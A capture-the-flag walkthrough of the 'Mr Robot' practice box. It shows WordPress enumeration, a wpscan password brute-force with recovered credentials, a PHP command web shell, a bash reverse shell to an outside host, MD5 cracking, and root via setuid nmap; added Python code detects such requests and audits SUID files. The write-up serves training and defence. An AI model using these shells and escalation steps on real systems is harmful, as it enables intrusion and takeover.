Mr Robot CTF
Initial scan:

We run a directory brute-force (the output below is from the run against 10.10.79.200):
$ gobuster dir -u http://10.10.79.200/ -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.79.200/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/21 11:27:31 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.79.200/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.79.200/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.79.200/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.79.200/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.79.200/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.79.200/images/]
/Image (Status: 301) [Size: 0] [--> http://10.10.79.200/Image/]
/image (Status: 301) [Size: 0] [--> http://10.10.79.200/image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.79.200/js/]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 64]
/rdf (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.79.200/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.79.200/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.79.200/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.79.200/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-load (Status: 200) [Size: 0]
/wp-login (Status: 200) [Size: 2606]
/wp-mail (Status: 500) [Size: 3064]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
We open robots.txt.
Visiting /robots.txt (or /robots) shows:
User-agent: *
fsocity.dic
key-1-of-3.txt
$ curl http://10.10.79.200/key-1-of-3.txt -o key1.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 33 100 33 0 0 95 0 --:--:-- --:--:-- --:--:-- 95
$ cat key1.txt
REDACTED
WPScan scan
wpscan performs a security assessment of a WordPress site. We run it in verbose mode and save the output to a file:
wpscan --url http://10.10.166.52/ -v -o wpscan-verbose
$ cat wpscan-verbose
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.79.200/ [10.10.79.200]
[+] Started: Fri May 21 11:55:02 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.79.200/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.79.200/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] The external WP-Cron seems to be enabled: http://10.10.79.200/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.79.200/wp-content/themes/twentyfifteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://10.10.79.200/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
| Author: the WordPress team
| Author URI: https://wordpress.org/
| License: GNU General Public License v2 or later
| License URI: http://www.gnu.org/licenses/gpl-2.0.html
| Tags: black, blue, gray, pink, purple, white, yellow, dark, light, two-columns, left-sidebar, fixed-layout, responsive-layout, accessibility-ready, custom-background, custom-colors, custom-header, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
| Text Domain: twentyfifteen
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[i] No plugins Found.
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri May 21 11:57:46 2021
[+] Requests Done: 140
[+] Cached Requests: 39
[+] Data Sent: 34.919 KB
[+] Data Received: 53.111 KB
[+] Memory used: 204.859 MB
[+] Elapsed time: 00:02:43
Brute-forcing the WordPress login
fsocity.dic
In robots.txt we also found a dictionary file.
After downloading it, we find that it looks like a username and password list.
Here we download the wordlist to use later:
$ wget 10.10.79.200/fsocity.dic
--2021-05-21 12:00:07-- http://10.10.79.200/fsocity.dic
Connecting to 10.10.79.200:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=============================================================>] 6.91M 752KB/s in 16s
2021-05-21 12:00:23 (445 KB/s) - ‘fsocity.dic’ saved [7245381/7245381]
Identifying the username
If you have watched Mr. Robot, you know that Elliot is the protagonist's name.
So I entered Elliot:something as the username and password.
And I was able to confirm that a user called Elliot exists.

Using wpscan. We know the username; now we need to brute-force the password.
We can use fsocity.dic as the wordlist, but the file is very large.
I tried keeping only the unique values with sort -u.
The file shrank drastically (from 850,000 values to 11,000). Brute-forcing is easy now!
$ wc -l fsocity.dic
858160 fsocity.dic
$ sort -u fsocity.dic > uniq-fscoity.dic
$ wc -l uniq-fscoity.dic
11451 uniq-fscoity.dic
I use wpscan to brute-force the password:
┌──(docker㉿docker)-[~/HackBox]
└─$ wpscan --url http://10.10.166.52 -t 50 -U Elliot -P uniq-fscoity.dic
[!] Valid Combinations Found:
| Username: Elliot, Password: ER28-0652
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Dec 28 16:34:01 2024
[+] Requests Done: 184
[+] Cached Requests: 6
[+] Data Sent: 1.233 MB
[+] Data Received: 1.189 MB
[+] Memory used: 303.211 MB
[+] Elapsed time: 00:01:29
We log in to the dashboard:

The shell would look like this if we want it to work as a form:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
It would look like this:

If we want it to connect back to our attacking machine:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.3.237/1234 0>&1'");
?>
This gives us the reverse shell:
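The brute-force run and the form shell above both leave a distinctive trace in the web server's access log. The detector below is an added example (not from the original writeup) that flags both over a constructed Apache-style log; the shell path /wp-content/themes/twentyfifteen/404.php and the 20-requests-per-minute threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit
# Apache combined-log fields we use: client IP, timestamp, method, request target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
def parse_line(line):
    """Return (ip, datetime, method, target, status), or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, target, int(status)

def login_bruteforce_sources(lines, threshold=20, window=timedelta(seconds=60)):
    """IPs that POST to wp-login.php or xmlrpc.php at least `threshold` times inside any `window`.
    xmlrpc.php is included because wpscan reported it enabled; it is the other password-guessing route."""
    times_by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec[2] == "POST" and urlsplit(rec[3]).path in ("/wp-login.php", "/xmlrpc.php"):
            times_by_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in times_by_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

def webshell_requests(lines):
    """Requests passing a cmd= parameter to a PHP file under wp-content/, the shape of the form shell above."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        url = urlsplit(rec[3])
        if url.path.startswith("/wp-content/") and url.path.endswith(".php") and "cmd" in parse_qs(url.query):
            hits.append((rec[0], url.path))
    return hits
# Constructed sample log (not captured from the box): a 25-request wpscan burst, one shell call, one normal login.
def _entry(ip, when, method, target, status, ua):
    return f'{ip} - - [{when.strftime("%d/%b/%Y:%H:%M:%S %z")}] "{method} {target} HTTP/1.1" {status} 512 "-" "{ua}"'
T0 = datetime(2024, 12, 28, 16, 32, 40, tzinfo=timezone.utc)
SAMPLE_LOG = [_entry("10.9.3.237", T0 + timedelta(seconds=i), "POST", "/wp-login.php", 200, "WPScan v3.8.17") for i in range(25)]
SAMPLE_LOG.append(_entry("10.9.3.237", T0 + timedelta(minutes=3), "GET", "/wp-content/themes/twentyfifteen/404.php?cmd=id", 200, "Mozilla/5.0"))  # assumed shell path
SAMPLE_LOG.append(_entry("192.0.2.7", T0 + timedelta(minutes=5), "POST", "/wp-login.php", 302, "Mozilla/5.0"))  # one ordinary login
```

Run against a real log, the same two functions take the file's lines; the user agent is deliberately not used as a signal, since wpscan can be told to spoof it.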
Now, looking around, we found an MD5 hash:
c3fcd3d76192e4007dfb496cca67e13b
We'll use the big rockyou wordlist...
┌──(docker㉿docker)-[~/HackBox]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Password: c3fcd3d76192e4007dfb496cca67e13b: abcdefghijklmnopqrstuvwxyz
Now, with the user's password, we log in as that user (robot).
Privilege escalation
The robot user has no sudo rights:
robot@linux:/$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.
Running linpeas
Linpeas readily revealed the privilege escalation vector:
nmap
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
.
.
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
robot@linux:~$ nmap --interactive
nmap> !sh
# ls
ls
key-2-of-3.txt password.raw-md5
# cat key-2-of-3.txt
cat key-2-of-3.txt
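A setuid nmap in /usr/local/bin is exactly the kind of finding a routine SUID audit catches before linpeas does. The Python below is an added example (not part of the writeup) that lists setuid files and reports those absent from an assumed baseline of stock setuid binaries; it builds its own throwaway directory tree as the fixture.

```python
import os
import stat
import tempfile

# Baseline of setuid binaries a stock Debian/Ubuntu host is expected to carry.
# Assumed list for this example; a real audit would take the reference from the
# distro package manifests or a golden image, and would also check the owner is root.
EXPECTED_SUID = {"sudo", "passwd", "su", "mount", "umount", "chsh", "chfn", "newgrp", "gpasswd"}

def find_suid_files(roots):
    """Walk the given roots and return (path, owner uid) for regular files with the setuid bit set."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat so symlinks are not followed
                except OSError:
                    continue  # unreadable or vanished entry
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append((path, st.st_uid))
    return found

def unexpected_suid(roots, expected=EXPECTED_SUID):
    """Setuid files whose basename is not in the baseline: the candidates to investigate.
    /usr/local/bin/nmap from the linpeas output above would land here, since nmap never ships setuid."""
    return sorted(p for p, _uid in find_suid_files(roots) if os.path.basename(p) not in expected)

def demo():
    """Constructed fixture mimicking the box: a setuid 'nmap', a setuid 'passwd' and a plain 'ls'."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    for rel, mode in (("usr/local/bin/nmap", 0o4755), ("usr/bin/passwd", 0o4755), ("usr/bin/ls", 0o755)):
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return [os.path.relpath(p, base) for p in unexpected_suid([base])]

if __name__ == "__main__":
    print(demo())  # expected: ['usr/local/bin/nmap']
```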